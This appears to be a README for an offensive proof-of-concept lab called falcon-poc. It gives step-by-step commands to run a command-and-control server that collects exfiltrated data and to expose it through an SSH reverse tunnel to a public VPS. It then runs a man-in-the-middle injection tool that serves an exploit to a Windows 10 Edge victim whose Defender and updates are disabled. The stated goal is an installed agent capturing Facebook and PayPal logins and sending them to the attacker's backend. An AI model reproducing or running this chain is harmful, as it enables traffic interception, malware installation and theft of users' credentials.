README POC
==========

    - Attacker: 10.1.10.100
    - Target: 10.1.10.200
    - Router: 10.1.10.1
    - VPS: 139.59.143.199

ATTACKER
========

    1) Install Ubuntu 16.04 LTS amd64

    2) Configure and enable an Internet connection

    3) Update all APT repositories

    $ sudo apt-get update

    4) Upgrade all packages via APT

    $ sudo apt-get upgrade
    $ sudo apt-get dist-upgrade

    5) Copy falcon-poc project into /home/user/Desktop/ and checkout into poc branch

    $ cp -aRf /media/user/POC/falcon-poc/ /home/user/Desktop/

    6) Run from terminal 1 (EXPLOIT WEBSERVER AND WEBSERVER EXFILTRATION):

    $ cd /home/user/Desktop/falcon-poc/websrv/
    $ git branch
    dev
    experimental
    master
    * poc       <---- Check if POC is right branch!!!
    $ sudo ./setup.sh
    $ sudo service mongodb start
    $ sudo mongo
    > use c2
    > db.bufs.remove({})
    WriteResult({ “nRemoved” : N })     <--- Where N >= 0
    CTRL+D (Exit from MongoDB)
    $ sudo python ./websrv.py

    In order to see exfiltrated data from agent, open Firefox and then open two tabs on:

    http://10.1.10.100:5000/logs
    http://10.1.10.100:5000/history

    7) Run from terminal 2 (SSH TUNNEL REMOTE PORT FORWARDING):

    $ ssh -R \*:80:localhost:5000 root@139.59.143.199
    No exit from SSH session on remote VPS!!!

    8) Run from terminal 3 (MITM & EXPLOIT ATTACK):

    $ cd /home/user/Desktop/falcon-poc/mitm-injection/
    $ git branch
    dev
    experimental
    master
    * poc        < - - - - CONTROLLARE BRANCH PUNTA SU POC!!!
    $ sudo ./setup.sh
    $ cd src/
    $ sudo ./Main.py -i wlp7s0 -g 10.1.10.1 -t 10.1.10.200 -u http://139.59.143.199/exploit

    Warning: Use wlp7s0 interface (if Wi-Fi is using) or enp0s25 (Else Ethernet)

VICTIM
======

    1) Install Windows 10 x64 build 1607

    2) Disable any Internet connection

    3) Open gpedit.msc with Administrator Privileges

    4) Disable Windows Defender on:

    Computer Configuration > Administrative Templates > Windows Components > Windows Defender > Turn Off Windows Defender > Enable

    5) Open again gpedit.msc with Administrator Privileges

    6) Disable Windows Update on:

    Computer Configuration > Administrative Templates > Windows Components > Windows Update > Configure Automatic Update > Disable

    7) Configure and enable an Internet connection

    8) Launch Microsoft Edge Web browser

    9) Clean cache of Microsoft Edge Web browser

    10) Open an HTTP web site like http://www.repubblica.it

    -> Now our exploit has started and our agent is installed!!!

    11) Open two HTTPS web site like https://www.facebook.com and https://www.paypal.com

    12) Login into both of https web sites opened before

    -> Now our agents collects data from HTTPS and it is sending them to our websrv backend!!!

Have fun!
